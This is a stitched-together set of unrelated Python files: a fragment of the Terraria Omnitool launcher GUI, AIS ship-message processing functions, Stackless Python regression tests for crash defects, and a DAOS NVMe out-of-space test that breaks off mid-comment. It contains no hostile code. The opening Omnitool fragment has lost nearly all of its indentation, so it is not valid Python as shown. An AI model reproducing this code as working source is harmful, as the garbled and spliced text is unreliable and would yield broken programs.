f.buffer = [0]
header = get_header(f)[0]
            if Plug.rec_header(header) != False:
                get_tile = iter_get_tile(select_tile_getter(header["version"]))(f)  # re-create the tile iterator for this file
                tiles = []
                for xi in range(header["width"]): # for each slice
                    tiles.append([next(get_tile) for _ in range(header["height"])])
if Plug.rec_tiles(tiles) != False:
if Plug.rec_chests(chests=[get_chest(f) for x in range(1000)]) != False:
if Plug.rec_signs(signs=[get_sign(f) for x in range(1000)]) != False:
npcs = []
while 1:
npc = get_npc(f)
if not npc:
break
else:
npcs.append(npc)
names = get_npc_names(f)
trail = get_trail(f)
if trail[1] != header["name"] or trail[2] != header["ID"]:
print("Warning, World signature test not passed")
Plug.rec_npcs(npcs, names)
if hasattr(Plug, "run"): Plug.run()
plug_save(Plug)
elif plug[2] == "modifier":
worlds = list(get_worlds())
from .plugingui import run as run_plugingui
w = run_plugingui(worlds, Plugin, "mod")
with w.open("rb") as f:
Plug = Plugin.Modifier()
f.buffer = [0]
header = get_header(f)[0]
Plug.rec_header(header)
get_tile = iter_get_tile(select_tile_getter(header["version"]))(f)
tiles = []
for xi in range(header["width"]): # for each slice
tiles.append([next(get_tile) for _ in range(header["height"])])
Plug.rec_tiles(tiles)
Plug.rec_chests(chests=[get_chest(f) for x in range(1000)])
Plug.rec_signs(signs=[get_sign(f) for x in range(1000)])
npcs = []
while 1:
npc = get_npc(f)
if not npc:
break
else:
npcs.append(npc)
names = get_npc_names(f)
trail = get_trail(f)
if trail[1] != header["name"] or trail[2] != header["ID"]:
print("Warning, World signature test not passed")
Plug.rec_npcs(npcs, names)
Plug.run()
plug_save(Plug)
else:
print("Unrecognized plugin type, aborting execution")
print(plug[1] + " is done")
sys.exit()
from .relay import launch_plugin as relay_launch_plugin
def run():
global app
global worldnames
global worlds
global display_worlds
try:
loc = myterraria / "Game Launcher" / "omnitool.gli3"
data = {
"appAuthor": __author__ + " (Berserker66)",
"appName": "Omnitool",
"appPath": os.path.abspath(sys.argv[0]),
"appVersion": __version__.__repr__()
}
with loc.open("wt") as f:
f.write(json.dumps(data, indent=4))
except:
import traceback
print("Could not register to GameLauncher 3. Maybe it just isn't installed. Exception:")
traceback.print_exc()
try:
worldnames = list(get_worlds())
except FileNotFoundError:
worldnames = []
print("Omnitool has found no worlds")
use_override = True
if use_override:
app = MyApp(theme=theme)
else:
import pgu
app = pgu.gui.App(theme=theme)
worlds = []
ts = [threading.Thread(target=get_world, args=(world, worlds)) for world in worldnames]
tuple(t.start() for t in ts)
pad = 10
x = 0
data = [
("Omnitool/" + lang.settings, Settings, None),
("Omnitool/" + "Language", Language, None),
("Omnitool/" + lang.report_issue, webbrowser.open, "https://github.com/Berserker66/omnitool/issues"),
("Omnitool/" + lang.exit, exit_prog, None),
(lang.start + "/" + lang.terraria, webbrowser.open, "steam://rungameid/105600"),
]
if "tedit" in cache and os.path.exists(cache["tedit"]):
def run_tedit(n):
subprocess.Popen(cache["tedit"], cwd=os.path.split(cache["tedit"])[0])
data.append((lang.start + "/TEdit", run_tedit, None))
if "terrafirma" in cache:
if os.path.exists(cache["terrafirma"]):
def run_terrafirma(n):
subprocess.Popen(cache["terrafirma"], cwd=os.path.split(cache["terrafirma"])[0])
data.append((lang.start + "/Terrafirma", run_terrafirma, None))
data.extend([
(lang.open + "/" + lang.imagefolder, open_dir, images),
(lang.open + "/" + lang.backupfolder, open_dir, myterraria / "WorldsBackup"),
(lang.open + "/" + lang.themes, open_dir, Path.cwd() / "themes"),
(lang.visit + "/" + lang.donate, webbrowser.open,
r"https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=JBZM8LFAGDK4N"),
(lang.visit + "/Patreon", webbrowser.open,
r"https://www.patreon.com/Berserker55"),
(lang.visit + "/" + lang.homepage, webbrowser.open,
r"http://forums.terraria.org/index.php?threads/omnitool-world-creation-mapping-backups-and-more.14664/"),
(lang.visit + "/" + lang.wiki, webbrowser.open, "http://terraria.gamepedia.com/Terraria_Wiki"),
(lang.visit + "/GameLauncher GUI", webbrowser.open,
"http://forums.terraria.org/index.php?threads/game-launcher-3-2-1-5.1061/"),
])
forbidden = ["flatworld", "planetoids", "worldify", "arena"]
for plug in plugins_:
if plug[0] not in forbidden and plug[2] != "injector":
data.append(("Plugins/%s" % plug[1], start_proc, (relay_launch_plugin, [plug[1], plug])))
os.environ["SDL_VIDEO_WINDOW_POS"] = "20,50"
app.connect(gui.QUIT, exit_prog, None)
main = gui.Table()
menu = gui.Menus(data)
main.td(gui.Spacer(pad, pad))
main.td(menu, colspan=5, align=-1)
main.td(gui.Spacer(pad, pad))
main.tr()
update = gui.Table()
update.td(gui.Label(""))
main.td(update, col=1, colspan=5, align=-1)
main.tr()
width = 190
worldify = GenButton(lang.worldify, IMAGE, width=width)
planetoids = GenButton(lang.planetoids, PLANET, width=width)
dungeon = GenButton(lang.arena, DUNGEON, width=width)
flat = GenButton(lang.flat, FLAT, width=width)
tuple(t.join() for t in ts)
expected_h = 170 * len(worlds) // cache["columns"] + 100
pygame.display.init()
available_h = max([res[1] for res in pygame.display.list_modes()])
if expected_h > available_h:
print("GUI expected to be higher than monitor height, adding columns")
cache["columns"] = max(cache["columns"] + 1, 1 + (170 * len(worlds)) // (available_h - 100))
del (ts)
newworldtable = gui.Table()
newworldtable.td(gui.Spacer(10, 10))
newworldtable.td(gui.Label(lang.new), align=-1)
newworldtable.tr()
newworldtable.td(gui.Spacer(10, 10))
newworldtable.td(worldify)
newworldtable.td(gui.Spacer(10, 10))
newworldtable.td(planetoids)
newworldtable.td(gui.Spacer(10, 10))
newworldtable.td(dungeon)
newworldtable.td(gui.Spacer(10, 10))
newworldtable.td(flat)
newworldtable.tr()
newworldtable.td(gui.Spacer(10, 10))
main.td(newworldtable, colspan=6)
main.tr()
worldtable = gui.Table()
main.td(worldtable, colspan=6)
def display_worlds(optionchange=False):
worldtable.clear()
x = 0
for w in worlds:
if x % cache["columns"] == 0:
worldtable.tr()
wtab = gui.Table()
wtab.td(w.info, colspan=2)
wtab.tr()
if thumbsize:
wtab.td(w.image, colspan=2)
else:
wtab.td(gui.Spacer(1, 20))
wtab.tr()
wtab.td(gui.Spacer(pad, pad))
wtab.tr()
wtab.td(gui.Spacer(420, 25), colspan=2)
wtab.tr()
worldtable.td(gui.Spacer(pad, 1))
worldtable.td(wtab)
x += 1
if x % cache["columns"] == 0:
worldtable.tr()
worldtable.td(gui.Spacer(12, 12))
if app.widget:
print("Window Reset!")
app.resize()
app.repaint()
size = pygame.display.get_surface().get_size()
data = {"size": size, "w": size[0], "h": size[1], "reload": True if optionchange else False}
pygame.event.post(pygame.event.Event(pygame.VIDEORESIZE, data))
display_worlds()
print("GUI Matrix created, initializing..")
pygame.display.quit()
pygame.display.init()
pygame.display.set_caption("Terraria Omnitool V%s | %d Bit" % (__version__.__repr__(), bit))
def make_resize(worlds, app, main):
def resize(self, ev):
if app.first and not app.zoomed:
app.first = False
else:
padding = 50
if hasattr(ev, "reload") and ev.reload == True:
thumb_w, thumb_h = cache["thumbsize"]
for w in worlds:
w.override_thumb((thumb_w, thumb_h))
w.info.style.width = thumb_w
w.thumbsize = (thumb_w, thumb_h)
else:
thumb_w = max((ev.w - padding) // cache["columns"], 420)
thumb_h = int(thumb_w / 3.5)
for w in worlds:
w.override_thumb((thumb_w, thumb_h))
w.info.style.width = thumb_w
w.thumbsize = (thumb_w, thumb_h)
app.rect.size = main.rect.size = main.w, main.h = main.resize()
if sys.platform.startswith("win"):
if windll.user32.IsZoomed(pygame.display.get_wm_info()['window']):
s = pygame.display.set_mode(ev.size, pygame.RESIZABLE)
app.rect.size = pygame.display.get_surface().get_size()
app.zoomed = True
else:
s = pygame.display.set_mode((main.w, main.h), pygame.RESIZABLE)
app.zoomed = False
else:
s = pygame.display.set_mode((main.w, main.h), pygame.RESIZABLE)
app.zoomed = False
app.screen = s
app.first = True
return resize
app.on_resize = make_resize(worlds, app, main)
app.init(main, None)
main.rect.h = max(main.rect.height, 250)
if cache["thumbsize"]:
pygame.display.set_mode((main.rect.size[0] - 2, main.rect.size[1] - 2), pygame.SWSURFACE | pygame.RESIZABLE)
else:
pygame.display.set_mode(main.rect.size, pygame.SWSURFACE)
info = Info()
info.name = "Info"
info.daemon = False
updater = Updater(update)
updater.daemon = False
if cache["do_backup"]:
b = Backupper()
b.name = "Backup"
b.start()
redrawer = Redrawer()
redrawer.start()
info.start()
updater.start()
app.run(main)
PLANET = 1
DUNGEON = 2
FLAT = 3
IMAGE = 4
from .relay import run_plat, run_arena, run_flat, run_world
bind = {1: (run_plat, "Planetoids"),
2: (run_arena, "Arena"),
3: (run_flat, "Flatworld"),
4: (run_world, "Worldify")}
|
functions.py
|
from src import postgresql as pgs
# Threading is not implemented in these functions because of the number of
# threads that would be spawned for each message type; this is easier to
# manage single-threaded.
# process the message depending on type
def more_processing(result):
if (result['id'] == 1) or (result['id'] == 2) or (result['id'] == 3):
location_data = modify_location(result)
pgs.save_location(location_data)
pgs.update_identity_from_location(location_data)
# Thread(target=pgs.save_location, args=(location_data,)).start()
# Thread(target=pgs.update_identity_from_location, args=(location_data,)).start()
elif result['id'] == 4:
station_data = modify_station(result)
pgs.save_stations(station_data)
elif result['id'] == 5:
identity_data = modify_info(result)
pgs.save_message5(identity_data)
# change the values of the dict to database style values.
def modify_station(data):
data['lat'] = data.pop('y')
data['lng'] = data.pop('x')
data['accuracy'] = data.pop('position_accuracy')
data['epfd'] = data.pop('fix_type')
del data['slot_timeout'], data['spare'], data['repeat_indicator']
del data['transmission_ctl'], data['sync_state'], data['id']
return data
# change the values of dict to database style values
def modify_info(data):
data['mmsi'] = data.pop('mmsi')
data['imo_number'] = data.pop('imo_num')
data['call_sign'] = data.pop('callsign')
data['ship_type'] = data.pop('type_and_cargo')
data['dimension_to_bow'] = data.pop('dim_a')
data['dimension_to_stern'] = data.pop('dim_b')
data['dimension_to_port'] = data.pop('dim_c')
data['dimension_to_starboard'] = data.pop('dim_d')
data['position_fix_type'] = data.pop('fix_type')
data['vessel_name'] = data.pop('name')
del data['id'], data['spare'], data['ais_version']
del data['dte'], data['repeat_indicator']
return data
# change the values of the dict to database style values
def modify_location(data):
data['lat'] = data.pop('y')
data['lng'] = data.pop('x')
data['speed'] = data.pop('sog')
data['accuracy'] = data.pop('position_accuracy')
data['true_heading'] = data.pop('true_heading')
data['turn'] = data.pop('rot')
data['course'] = data.pop('cog')
data['time_stamp'] = data.pop('timestamp')
del data['repeat_indicator'], data['rot_over_range']
del data['sync_state'], data['spare'], data['id'], data['raim']
return data
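# Usage sketch (not part of the original module): `decoded_messages` is a
# hypothetical iterable of decoded AIS message dicts, each carrying the 'id'
# field that more_processing() dispatches on.
def process_stream(decoded_messages):
    for message in decoded_messages:
        more_processing(message)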
|
test_defects.py
|
from __future__ import print_function, absolute_import, division
import unittest
import stackless
import gc
import sys
import types
from io import BytesIO
import time
try:
import threading
withThreads = True
except ImportError:
withThreads = False
from stackless import _test_nostacklesscall as apply_not_stackless
from support import test_main # @UnusedImport
from support import (StacklessTestCase, captured_stderr, require_one_thread,
get_reduce_frame)
"""
Various regression tests for stackless defects.
Typically, one can start by adding a test here, then fix it.
Don't check in tests for un-fixed defects unless they are disabled (by adding a leading _)
"""
class TestTaskletDel(StacklessTestCase):
# Defect: If a tasklet's tempval contains any non-trivial __del__ function, it will cause
# an assertion in debug mode due to violation of the stackless protocol.
# The return value of the tasklet's function is stored in the tasklet's tempval and cleared
# when the tasklet exits.
# Also, the tasklet itself would have problems with a __del__ method.
class ObjWithDel:
def __del__(self):
self.called_func()
def called_func(self):
pass # destructor must call a function
class TaskletWithDel(stackless.tasklet):
def __del__(self):
self.func()
def func(self):
pass
class TaskletWithDelAndCollect(stackless.tasklet):
def __del__(self):
gc.collect()
def BlockingReceive(self):
# Function to block when run in a tasklet.
def f():
# must store c in locals
c = stackless.channel()
c.receive()
return stackless.tasklet(f)()
# Test that a tasklet tempval's __del__ operator works.
def testTempval(self):
def TaskletFunc(self):
return self.ObjWithDel()
stackless.tasklet(TaskletFunc)(self)
stackless.run()
# Test that a tasklet's __del__ operator works.
def testTasklet(self):
def TaskletFunc(self):
pass
self.TaskletWithDel(TaskletFunc)(self)
stackless.run()
    # a gc.collect() in a tasklet's __del__ method causes a crash
def testCrash1(self):
# we need a lost blocked tasklet here (print the ids for debugging)
hex(id(self.BlockingReceive()))
gc.collect() # so that there isn't any garbage
stackless.run()
def TaskletFunc(self):
pass
hex(id(self.TaskletWithDelAndCollect(TaskletFunc)(self)))
stackless.run() # crash here
@unittest.skipUnless(withThreads, "requires thread support")
def test_tasklet_dealloc_in_thread_shutdown(self):
# Test for https://bitbucket.org/stackless-dev/stackless/issues/89
def other_thread_main():
# print("other thread started")
self.assertIs(stackless.main, stackless.current)
tasklet2 = stackless.tasklet(apply_not_stackless)(stackless.main.run,)
# print("OT Main:", stackless.main)
# print("OT tasklet2:", tasklet2)
tasklet2.run()
self.assertTrue(tasklet2.scheduled)
self.other_thread_started = True
# the crash from issue #89 happened during the shutdown of other thread
self.other_thread_started = False
self.assertIs(stackless.main, stackless.current)
# print("Main Thread:", stackless.main)
t = threading.Thread(target=other_thread_main, name="other thread")
t.start()
t.join()
self.assertTrue(self.other_thread_started)
# print("OK")
class Schedule(StacklessTestCase):
def testScheduleRemove(self):
# schedule remove doesn't work if it is the only tasklet running under watchdog
def func(self):
stackless.schedule_remove()
self.fail("We shouldn't be here")
stackless.run() # flush all runnables
t = stackless.tasklet(func)(self)
stackless.run()
t.kill() # avoid a resource leak caused by an uncollectable tasklet
@require_one_thread
def testScheduleRemove2(self):
# schedule remove doesn't work if it is the only tasklet with main blocked
# main tasklet is blocked, this should raise an error
def func(self, chan):
self.assertRaises(RuntimeError, stackless.schedule_remove)
chan.send(None)
stackless.run() # flush all runnables
chan = stackless.channel()
stackless.tasklet(func)(self, chan)
chan.receive()
def testScheduleRemove3(self):
'''Schedule-remove the last reference to a tasklet 1'''
def func():
stackless.schedule_remove(None)
stackless.tasklet(func)()
stackless.run()
def testScheduleRemove4(self):
'''Schedule-remove the last reference to a tasklet 2'''
def func():
stackless.schedule_remove(None)
stackless.tasklet(func)()
stackless.schedule_remove(None)
class Channel(StacklessTestCase):
def testTemporaryChannel(self):
def f1():
stackless.channel().receive()
stackless.tasklet(f1)()
old = stackless.enable_softswitch(True)
try:
stackless.run()
finally:
stackless.enable_softswitch(old)
def testTemporaryChannel2(self):
def f1():
stackless.channel().receive()
def f2():
pass
stackless.tasklet(f1)()
stackless.tasklet(f2)()
old = stackless.enable_softswitch(True)
try:
stackless.run()
finally:
stackless.enable_softswitch(old)
class TestInfiniteRecursion(StacklessTestCase):
# test for http://www.stackless.com/ticket/20
def testDirectRecursion(self):
class A(object):
# define __call__ in case http://www.stackless.com/ticket/18 is not fixed
def __call__(self):
pass
A.__call__ = A()
a = A()
# might crash the Python(r) interpreter, if the recursion check does not kick in
self.assertRaises(RuntimeError, a)
def testIndirectDirectRecursion(self):
class A(object):
def __call__(self):
pass
class B(object):
def __call__(self):
pass
A.__call__ = B()
B.__call__ = A()
a = A()
self.assertRaises(RuntimeError, a)
class TestExceptionInScheduleCallback(StacklessTestCase):
# Problem
# Assertion failed: ts->st.current == NULL, file ..\Stackless\module\taskletobject.c, line 51
# See https://bitbucket.org/stackless-dev/stackless/issue/38
def scheduleCallback(self, prev, next):
if next.is_main:
raise RuntimeError("scheduleCallback")
def testExceptionInScheduleCallback(self):
stackless.set_schedule_callback(self.scheduleCallback)
self.addCleanup(stackless.set_schedule_callback, None)
stackless.tasklet(lambda: None)()
with captured_stderr() as stderr:
stackless.run()
self.assertTrue("scheduleCallback" in stderr.getvalue())
class TestCrashUponFrameUnpickling(StacklessTestCase):
def testCrasher(self):
import pickle
frame = sys._getframe()
frameType = type(frame)
while frame and frame.f_back:
frame = frame.f_back
frame = get_reduce_frame()(frame)
p = pickle.dumps(frame, -1)
frame = None
frame = pickle.loads(p)
self.assertIsInstance(frame, frameType)
# this access crashes Stackless versions released before Feb 2nd 2014
f_back = frame.f_back
self.assertIsNone(f_back)
def testMissingLocalsplusCrasher(self):
# A test case for issue #61 https://bitbucket.org/stackless-dev/stackless/issue/61
#
# Some versions of stackless create pickles of frames with the localsplus tuple set to None.
# This test creates a frame with localsplus=None and ensures that Python does not crash upon
# accessing frame.f_locals
def reduce_current():
result = []
def func(current):
result.append(stackless._wrap.frame.__reduce__(current.frame))
stackless.tasklet().bind(func, (stackless.current,)).run()
return result[0]
func, args, state = reduce_current()
# state is a tuple of the form
# ('f_code', 'valid', 'exec_name', 'f_globals', 'have_locals',
# 'f_locals', 'f_trace', 'f_lasti', 'f_lineno',
# 'blockstack_as_tuple', 'localsplus_as_tuple')
self.assertEqual(len(state), 11)
state = list(state)
# set valid=0, localsplus_as_tuple=None
state[1] = 0
state[-1] = None
state = tuple(state)
# create the frame
frame = func(*args)
frame.__setstate__(state)
self.assertIsInstance(frame, types.FrameType)
# this access crashes Stackless versions released before May 20th 2014
f_locals = frame.f_locals
self.assertIsInstance(f_locals, dict)
class TestShutdown(StacklessTestCase):
def test_cstack_new(self):
# test for issue #80 https://bitbucket.org/stackless-dev/stackless/issues/80/
import subprocess
rc = subprocess.call([sys.executable, "-s", "-S", "-E", "-c", """if 1:
import stackless, sys
from stackless import _test_nostacklesscall as apply_not_stackless
def func():
global channel
assert stackless.current.nesting_level == 0
assert apply_not_stackless(lambda : stackless.current.nesting_level) == 1, "apply_not_stackless does not recurse"
apply_not_stackless(channel.receive) # crash at nesting level 1
channel = stackless.channel()
task = stackless.tasklet().bind(func, ()) # simplest tasklet
task.run()
sys.exit(42)
"""])
self.assertEqual(rc, 42)
@unittest.skipUnless(withThreads, "requires thread support")
def test_interthread_kill(self):
# test for issue #87 https://bitbucket.org/stackless-dev/stackless/issues/87/
import subprocess
rc = subprocess.call([sys.executable, "-s", "-S", "-E", "-c", """from __future__ import print_function, absolute_import\nif 1:
import sys
import _thread as thread
import stackless
import os
import time
from stackless import _test_nostacklesscall as apply_not_stackless
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
if False: # change to True to enable debug messages
sys.stdout = sys.stderr # C-assert messages go to STDERR
else:
def print(*args):
pass
# Module globals are cleared before __del__ is run
# So we save functions, objects, ... in a class dict.
class C(object):
time_sleep = time.sleep
def other_thread_main(self):
print("other thread started")
assert stackless.main.nesting_level == 0
self.main = stackless.main
assert stackless.main is stackless.current
t1 = stackless.tasklet(apply_not_stackless)(self.main.switch)
t1.run()
assert t1.paused
assert t1.nesting_level == 1
print("OT-Main:", self.main)
print("OT-t1:", t1)
try:
ready.release()
while True:
self.main.run()
except TaskletExit:
self.time_sleep(999999)
print("Main-Thread:", stackless.current)
x = C()
thread.start_new_thread(x.other_thread_main, ())
ready.acquire() # Be sure the other thread is waiting.
x.main.kill()
time.sleep(0.5) # give other thread time to run
# state is now: other thread has 2 tasklets:
# - main tasklet is stackless and blocked in sleep(999999)
# - t1 has a C-state and is paused
print("at end")
sys.stdout.flush()
sys.exit(42)
"""])
self.assertEqual(rc, 42)
@unittest.skipUnless(withThreads, "requires thread support")
def test_tasklet_end_with_wrong_recursion_level(self):
# test for issue #91 https://bitbucket.org/stackless-dev/stackless/issues/91/
"""A test for issue #91, wrong recursion level after tasklet re-binding
Assertion failed: ts->recursion_depth == 0 || (ts->st.main == NULL && prev == next), file ../Stackless/module/scheduling.c, line 1291
The assertion fails with ts->recursion_depth > 0
It is in function
static int schedule_task_destruct(PyObject **retval, PyTaskletObject *prev, PyTaskletObject *next):
assert(ts->recursion_depth == 0 || (ts->st.main == NULL && prev == next));
During thread shutdown in slp_kill_tasks_with_stacks() kills tasklet tlet after the main
tasklet of other thread ended. To do so, it creates a new temporary main tasklet. The
assertion failure happens during the end of the killed tasklet.
"""
self.skipUnlessSoftswitching()
if True:
def print(*args):
pass
def tlet_inner():
assert stackless.current.recursion_depth >= 2, "wrong recursion depth: %d" % (stackless.current.recursion_depth,)
stackless.main.switch()
def tlet_outer():
tlet_inner()
def other_thread_main():
self.tlet = stackless.tasklet(tlet_outer)()
self.assertEqual(self.tlet.recursion_depth, 0)
print("Other thread main", stackless.main)
print("Other thread paused", self.tlet)
self.tlet.run()
self.assertGreaterEqual(self.tlet.recursion_depth, 2)
self.tlet.bind(lambda: None, ()) # requires soft switching
self.assertEqual(self.tlet.recursion_depth, 0)
# before issue #91 got fixed, the assertion violation occurred here
print("Main thread", stackless.current)
t = threading.Thread(target=other_thread_main, name="other thread")
t.start()
print("OK")
t.join()
print("Done")
class TestStacklessProtokoll(StacklessTestCase):
"""Various tests for violations of the STACKLESS_GETARG() STACKLESS_ASSERT() protocol
See https://bitbucket.org/stackless-dev/stackless/issues/84
"""
def test_invalid_args_channel_next(self):
"""test of typeobject.c wrap_next(...)"""
func = stackless.channel().__next__
# func(None) causes the crash
self.assertRaises(TypeError, func, None)
def test_invalid_args_tasklet_kill(self):
func = stackless.tasklet().kill
# func(False, None) causes the crash
self.assertRaises(TypeError, func, False, None)
class TestCPickleBombHandling_Dict(dict):
pass
class TestCPickleBombHandling_Cls(object):
def __getstate__(self):
try:
started = self.started
except AttributeError:
pass
else:
self.started = None
started.set()
# print("started")
time.sleep(0.05) # give the other thread a chance to run
return self.__dict__
class TestCPickleBombHandling(StacklessTestCase):
def other_thread(self, pickler, c):
try:
pickler.dump(c)
except TaskletExit:
self.killed = None
except:
self.killed = sys.exc_info()
else:
self.killed = False
@unittest.skipUnless(withThreads, "requires thread support")
def test_kill_during_cPickle_stack_switch(self):
# this test kills the main/current tasklet of a other-thread,
# which is fast-pickling a recursive structure. This leads to an
# infinite recursion, which gets interrupted by a bomb thrown from
# main-thread. Until issue #98 got fixed, this caused a crash.
# See https://bitbucket.org/stackless-dev/stackless/issues/98
buf = BytesIO()
import _pickle as pickle
pickler = pickle.Pickler(buf, protocol=-1)
pickler.fast = 1
started = threading.Event()
c = TestCPickleBombHandling_Cls()
c.started = started
d = TestCPickleBombHandling_Dict()
d[1] = d
c.recursive = d
self.killed = "undefined"
t = threading.Thread(target=self.other_thread, name="other_thread", args=(pickler, c))
t.start()
started.wait()
stackless.get_thread_info(t.ident)[0].kill(pending=True)
# print("killing")
t.join()
if isinstance(self.killed, tuple):
            raise self.killed[1].with_traceback(self.killed[2])  # re-raise the captured exception with its original traceback
self.assertIsNone(self.killed)
class TestFrameClear(StacklessTestCase):
def test_frame_clear(self):
# a test for Stackless issue #66
# https://bitbucket.org/stackless-dev/stackless/issues/66
def generator():
yield None
geniter = generator()
frame = geniter.gi_frame
frame.clear() # causes the failure
class TestContextManager(StacklessTestCase):
def test_crash_on_WHY_SILENCED(self):
current_switch = stackless.current.switch
steps = []
class CtxManager:
def __enter__(self):
steps.append(2)
def __exit__(self, exc_type, exc_val, exc_tb):
steps.append(4)
current_switch() # causes a stack corruption upon resuming __exit__
steps.append(5)
return True # silence the exception
def task():
try:
steps.append(1)
return "OK"
finally:
with CtxManager():
steps.append(3)
1 // 0
steps.append(6)
# Stackless issue #115 ()
# Leaving this finally block crashes Python,
# because the interpreter stack is corrupt.
t = stackless.tasklet(task)()
t.run()
self.assertListEqual(steps, [1, 2, 3, 4])
t.run()
r = t.tempval
self.assertListEqual(steps, [1, 2, 3, 4, 5, 6])
class TestUnwinding(StacklessTestCase):
# a test case for https://bitbucket.org/stackless-dev/stackless/issues/119
# The macros STACKLESS_PACK(retval) / STACKLESS_UNPACK(retval) are not thread
# safe. And thread switching can occur, if a destructor runs during stack unwinding.
def test_interpreter_recursion(self):
# This test calls pure Python-functions during unwinding.
# The test ensures, that a recursively invoked interpreter does not
# unwind the stack, while a higher level interpreter unwinds the stack.
self.skipUnlessSoftswitching()
def inner_detector():
pass
class Detector(object):
def __del__(self):
# print("__del__, going to sleep", file=sys.stderr)
inner_detector()
def inner_func():
return 4711
def func():
return inner_func()
func.detector = Detector()
get_func = [func].pop
del func
# there is only one reference to func.
# print("going to call func", file=sys.stderr)
# call func and release the last reference to func. This way
# Detector.__del__ runs during stack unwinding.
# Until STACKLESS_PACK(retval) / STACKLESS_UNPACK(retval) becomes
# thread safe, this raises SystemError or crashes with an assertion
# failure.
r = get_func()()
# print("called func", file=sys.stderr)
self.assertEqual(r, 4711)
@unittest.skipUnless(withThreads, "requires thread support")
def test_concurrent_unwinding(self):
# This test switches tasks during unwinding. The other tasks performs stackless
# calls too. This test ensures, that the STACKLESS_PACK() / STACKLESS_UNPACK()
# mechanism is thread safe.
self.skipUnlessSoftswitching()
terminate = False
started = threading.Event()
go = threading.Event()
def other_thread_inner():
started.set()
self.assertEqual(stackless.current.nesting_level, 0)
def other_thread():
"""A thread, that repeatedly calls other_thread_inner() at nesting level 0.
"""
while not terminate:
other_thread_inner()
go.wait() # used to start in a defined state
class Detector(object):
def __del__(self):
# print("__del__, going to sleep", file=sys.stderr)
go.set() # make other_thread runnable
time.sleep(0.1) # release GIL
# print("__del__, sleep done", file=sys.stderr)
pass
def inner_func():
return 4711
def func():
return inner_func()
t = threading.Thread(target=other_thread, name="other_thread")
t.start()
started.wait()
        time.sleep(0.05)  # give other_thread time to reach go.wait()
func.detector = Detector()
get_func = [func].pop
del func
# there is only one reference to func.
# print("going to call func", file=sys.stderr)
try:
# call func and release the last reference to func. This way
# Detector.__del__ runs during stack unwinding.
# Until STACKLESS_PACK(retval) / STACKLESS_UNPACK(retval) becomes
# thread safe, this raises SystemError or crashes with an assertion
# failure.
r = get_func()()
finally:
# make sure, that other_thread terminates
terminate = True
go.set() # just in case Detector.__del__() does not run
t.join(.5)
# print("called func", file=sys.stderr)
self.assertEqual(r, 4711)
if __name__ == '__main__':
if not sys.argv[1:]:
sys.argv.append('-v')
unittest.main()
|
enospace.py
|
#!/usr/bin/python
'''
(C) Copyright 2020-2022 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
'''
import time
import threading
from apricot import skipForTicket
from nvme_utils import ServerFillUp
from avocado.core.exceptions import TestFail
from daos_utils import DaosCommand
from job_manager_utils import get_job_manager
from ior_utils import IorCommand, IorMetrics
from exception_utils import CommandFailure
from general_utils import error_count
class NvmeEnospace(ServerFillUp):
# pylint: disable=too-many-ancestors
"""
Test Class Description: To validate DER_NOSPACE for SCM and NVMe
:avocado: recursive
"""
def __init__(self, *args, **kwargs):
"""Initialize a NvmeEnospace object."""
super().__init__(*args, **kwargs)
self.daos_cmd = None
def setUp(self):
"""Initial setup"""
super().setUp()
# initialize daos command
self.daos_cmd = DaosCommand(self.bin)
self.create_pool_max_size()
self.der_nospace_count = 0
self.other_errors_count = 0
self.test_result = []
    def verify_enspace_log(self, der_nospace_err_count):
        """
        Verify there are no errors other than DER_NOSPACE and DER_NO_HDL in the
        client log, and that the DER_NOSPACE count is at least the expected value.
        args:
            der_nospace_err_count (int): Expected DER_NOSPACE count from client log.
        """
#Get the DER_NOSPACE and other error count from log
self.der_nospace_count, self.other_errors_count = error_count(
"-1007", self.hostlist_clients, self.client_log)
#Get the DER_NO_HDL and other error count from log
der_nohdl_count, other_nohdl_err = error_count(
"-1002", self.hostlist_clients, self.client_log)
#Check there are no other errors in log file except DER_NO_HDL
if self.other_errors_count != der_nohdl_count:
self.fail('Found other errors, count {} in client log {}'
.format(int(self.other_errors_count-other_nohdl_err),
self.client_log))
#Check the DER_NOSPACE error count is higher if not test will FAIL
if self.der_nospace_count < der_nospace_err_count:
self.fail('Expected DER_NOSPACE should be > {} and Found {}'
.format(der_nospace_err_count, self.der_nospace_count))
def delete_all_containers(self):
"""
Delete all the containers.
"""
#List all the container
kwargs = {"pool": self.pool.uuid}
data = self.daos_cmd.container_list(**kwargs)
containers = [uuid_label["uuid"] for uuid_label in data["response"]]
#Destroy all the containers
for _cont in containers:
kwargs["cont"] = _cont
kwargs["force"] = True
self.daos_cmd.container_destroy(**kwargs)
def ior_bg_thread(self):
"""Start IOR Background thread, This will write small data set and
keep reading it in loop until it fails or main program exit.
"""
# Define the IOR Command and use the parameter from yaml file.
ior_bg_cmd = IorCommand()
ior_bg_cmd.get_params(self)
ior_bg_cmd.set_daos_params(self.server_group, self.pool)
ior_bg_cmd.dfs_oclass.update(self.ior_cmd.dfs_oclass.value)
ior_bg_cmd.api.update(self.ior_cmd.api.value)
ior_bg_cmd.transfer_size.update(self.ior_scm_xfersize)
ior_bg_cmd.block_size.update(self.ior_cmd.block_size.value)
ior_bg_cmd.flags.update(self.ior_cmd.flags.value)
ior_bg_cmd.test_file.update('/testfile_background')
# Define the job manager for the IOR command
job_manager = get_job_manager(self, "Mpirun", ior_bg_cmd, mpi_type="mpich")
# create container
container = self.get_container(self.pool)
job_manager.job.dfs_cont.update(container.uuid)
env = ior_bg_cmd.get_default_env(str(job_manager))
job_manager.assign_hosts(self.hostlist_clients, self.workdir, None)
job_manager.assign_processes(1)
job_manager.assign_environment(env, True)
print('----Run IOR in Background-------')
# run IOR Write Command
try:
job_manager.run()
except (CommandFailure, TestFail) as _error:
self.test_result.append("FAIL")
return
# run IOR Read Command in loop
ior_bg_cmd.flags.update(self.ior_read_flags)
while True:
try:
job_manager.run()
except (CommandFailure, TestFail) as _error:
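                # A read failure is expected once the pool runs out of space; stop the loop.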
break
def run_enospace_foreground(self):
"""
        Run the test and validate DER_NOSPACE and the expected storage size.
"""
        #Fill 75% of the SCM pool. Aggregation is enabled, so NVMe space will
        #start filling.
print('Starting main IOR load')
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=75)
print(self.pool.pool_percentage_used())
        #Fill 50% more of the SCM pool. Aggregation is enabled, so NVMe space
        #will be filled.
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=50)
print(self.pool.pool_percentage_used())
        #Fill 60% more of the SCM pool. NVMe is now full, so data will not be
